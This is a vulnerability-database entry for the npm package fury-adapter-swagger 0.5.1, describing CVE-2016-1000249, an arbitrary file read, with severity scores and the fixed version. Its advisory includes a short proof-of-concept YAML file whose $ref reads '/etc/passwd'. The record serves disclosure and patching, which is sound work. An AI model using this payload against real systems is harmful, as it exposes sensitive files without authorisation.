Lookup for vulnerable packages by Package URL.
| Field | Value |
| --- | --- |
| Purl | pkg:npm/fury-adapter-swagger@0.5.1 |
| Type | npm |
| Namespace | |
| Name | fury-adapter-swagger |
| Version | 0.5.1 |
| Qualifiers | |
| Subpath | |
| Is_vulnerable | true |
| Next_non_vulnerable_version | 0.9.7 |
| Latest_non_vulnerable_version | 0.9.7 |

Affected_by_vulnerabilities[0]:

| Field | Value |
| --- | --- |
| url | VCID-t7jm-25zs-aqfq |
| vulnerability_id | VCID-t7jm-25zs-aqfq |
| summary | Arbitrary File Read (full text below) |
| references | |
| fixed_packages | |
| aliases | CVE-2016-1000249, GHSA-2r7f-4h2c-5x73 |
| risk_score | 4.1 |
| exploitability | 0.5 |
| weighted_severity | 8.2 |
| resource_url | http://public2.vulnerablecode.io/vulnerabilities/VCID-t7jm-25zs-aqfq |

Summary of VCID-t7jm-25zs-aqfq:

Arbitrary File Read

fury-adapter-swagger is a fury.js adapter for loading swagger HTTP API description documents, either via YAML or JSON.

fury-adapter-swagger has a vulnerability that allows arbitrary file reads off the file system. This could be used to retrieve sensitive data, or cause a denial of service by reading `/dev/zero`. An example proof of concept is provided below:

```yaml
---
swagger: '2.0'
info:
  title: Read local files
  version: '1.0'
paths:
  /foo:
    get:
      responses:
        200:
          description: Some description
          examples:
            text/html:
              example:
                $ref: '/etc/passwd'
```

| Field | Value |
| --- | --- |
| Fixing_vulnerabilities | |
| Risk_score | null |
| Resource_url | http://public2.vulnerablecode.io/packages/pkg:npm/fury-adapter-swagger@0.5.1 |